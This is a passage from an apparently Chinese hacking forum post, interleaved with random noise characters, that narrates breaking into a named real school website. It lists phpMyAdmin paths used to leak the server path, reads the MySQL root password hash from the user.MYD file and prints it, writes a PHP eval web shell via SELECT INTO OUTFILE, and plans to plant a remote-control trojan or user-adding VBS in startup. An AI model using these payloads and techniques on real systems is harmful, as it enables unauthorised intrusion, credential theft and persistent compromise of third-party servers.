3、magic_quotes_gpc()=OFF
, T: a; x& G; {8 K. `& q5 r6 x; V* e, |8 `+ v M
试着爆绝对路径:
$ h9 D+ _' P6 {1 }5 t, C
1./phpMyAdmin/index.php?lang[]=1
; i4 r; j+ m2 z; B2./phpMyAdmin/phpinfo.php
% x9 I9 c! l" d! `+ _% S( ^3./load_file()
& |6 \2 J4 j5 _ }& M4./phpmyadmin/themes/darkblue_orange/layout.inc.php
/ V" B- y" a2 }, \
5./phpmyadmin/libraries/select_lang.lib.php
X% J0 [: T8 ]# `
6./phpmyadmin/libraries/lect_lang.lib.php
: W" @9 n0 o/ c7./phpmyadmin/libraries/mcrypt.lib.php
' I( c+ n3 n) V, O6 T
8./phpmyadmin/libraries/export/xls.php
7 @$ I& A0 _" T* v4 H" t, h0 b6 |, e8 n3 x6 t
均不行...........................
# b) G+ a X# o. u: }
& v: }) [+ {1 c+ k# @御剑扫到这个:
http://www.dyyz.net.cn//phpinfo.php 获得网站路径:D:/www/phpinfo.php
0 P. ]6 T2 E3 B: Q3 e/ b2 b& l9 n+ _- d
权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin
. i" N5 b/ R$ D& g) }9 [) P
# K: d; D) l0 [2 Y4 O/ n9 |默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败
2 w+ D+ F0 Z( y& m3 d/ E6 y/ s+ i
& L1 D, u5 d3 w- P0 V敏感东西:
http://202.103.49.66/Admincp.php 社工进不去...........
( h5 \ I. Q# i3 C+ R$ @( N! |' ^0 B' Q5 P7 L* T
想想root还可以读,读到root密码进phpmyadmin 也可以拿shell
6 @. Z7 c. \+ P5 B; J( k
! z! q, z0 M/ Uhttp://www.dyyz.net.cn//phpinfo.php 泄露了D:\phpStudy\PHP5\php.ini
, U" B7 s6 U6 _5 E( y4 [4 A
8 u( f8 g0 w- L
自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD
3 d2 }! r* ] {8 Y" J8 d5 Q
( X& ?7 D9 ?& r4 W O' I! r成功读到root密码:
0 n) y8 c+ M! {$ r. Q: u
2 f2 I4 q8 K9 ~9 R/ e
17---- r(0072)
5 N3 u+ N. l6 L5 r! x; h: S
18---- o(006f)
- R! w) t2 M8 N2 z2 m
19---- o(006f)
% {# G& h6 e0 D ^% E20---- t(0074)
$ g1 t! R; i- j: O1 A% D
21---- *(002a)
0 T4 q C- n+ U3 R, F- {- i7 u+ ^22---- 8(0038)
# H- m/ [/ V3 i6 T- O/ g
23---- 2(0032)
* D- n+ J% j' g9 Q: y9 g24---- E(0045)
& k: _ l4 o' T; l25---- 1(0031)
. T. m; ?$ q% Z& i0 y* F* ?/ C
26---- C(0043)
! k4 }5 {" D) ^3 T/ Y+ D
27---- 5(0035)
. X0 v5 ^2 u8 P0 g; E28---- 8(0038)
; C, \+ I/ g6 J9 y0 q* i# m
29---- 2(0032)
' ~9 r' l% r0 `/ w( ~" }5 m30---- 8(0038)
( ~ Q# F" y7 m2 u- {
31---- A(0041)
$ Y% M8 @9 J4 ?5 c8 k* t( d32---- 9(0039)
: ?( ~; B6 [5 l
33---- B(0042)
: l/ ~. z/ ~# t- e
34---- 5(0035)
% g: C* e0 g [+ V35---- 4(0034)
& N9 F! i/ M* r: R' c36---- 8(0038)
2 ]0 ^! v7 z. p7 t; }7 C37---- 6(0036)
' W& o8 w# C& |
38---- 4(0034)
8 W# T" m2 z9 o. L2 t% k r39---- 9(0039)
) ^0 }' v m! _. Z) W# ^+ J
40---- 1(0031)
( j7 Q: |3 o1 p; i+ d$ I41---- 1(0031)
" {" |8 f/ Y& t m+ I42---- 5(0035)
( n5 M& P' d+ }
43---- 3(0033)
- e1 j, C0 v0 O; m% s/ f% L: Y2 S44---- 5(0035)
; Q3 w' q3 U$ y" O6 ?. I
45---- 9(0039)
8 j" ]& Y0 f5 p
46---- 8(0038)
! X3 Y E# f) a! x0 Z3 C9 F47---- F(0046)
3 p v/ A+ j6 ]: Q1 F48---- F(0046)
5 _* }- Y& x, @
49---- 4(0034)
2 S+ b2 o, A; {6 [4 G50---- F(0046)
# S8 H# ]1 i5 Y8 I+ |51---- 0(0030)
- I/ Y w( |- x. N52---- 3(0033)
4 F# `4 c% y A8 N
53---- 2(0032)
: ^6 L1 }0 M# }5 O% t* K5 d3 i
54---- A(0041)
2 m1 e4 N0 r, V5 C/ t
55---- 4(0034)
# N' m6 Q1 z& D1 k5 h: ^9 \
56---- A(0041)
C+ ^) h. j8 P4 `
57---- B(0042)
% {6 a2 g0 j* J" R
58---- *(0044)
- I2 r2 Y' S6 ^. s
59---- *(0035)
8 V+ e( |9 U: E& V8 ] p
60---- *(0041)
" {' h; g' o$ O: E* y) P61---- *0032)
/ \2 |" R; f6 t$ n
Z; t. }0 N2 f7 w9 s5 T+ [4 B解密后成功登陆phpmyamin
: g* d, D% X" V6 C8 F5 x* x" o " C& B6 f3 b1 K/ U# w% ]
5 e& F* U' b9 {5 m& @
[attach]164[/attach]
5 Y" T* h: ]6 Y5 Q5 q! ~/ z+ q+ ?# T4 N" c; P- j
找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'
E/ O# D8 B K7 O6 _+ f
( V- ~# b& e/ ~+ ^1 ^成功执行,拿下shell,菜刀连接:
f7 V- b8 d+ F# N+ `. p* T
+ o& E* W5 I) i0 @3 x; \服务器不支持asp,aspx,php提权无果...................
' u1 A7 U( l( ?5 z' V: x
6 k) G% A4 k0 o3 F0 |% S) t但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里:
& ?* Y1 r7 ]. l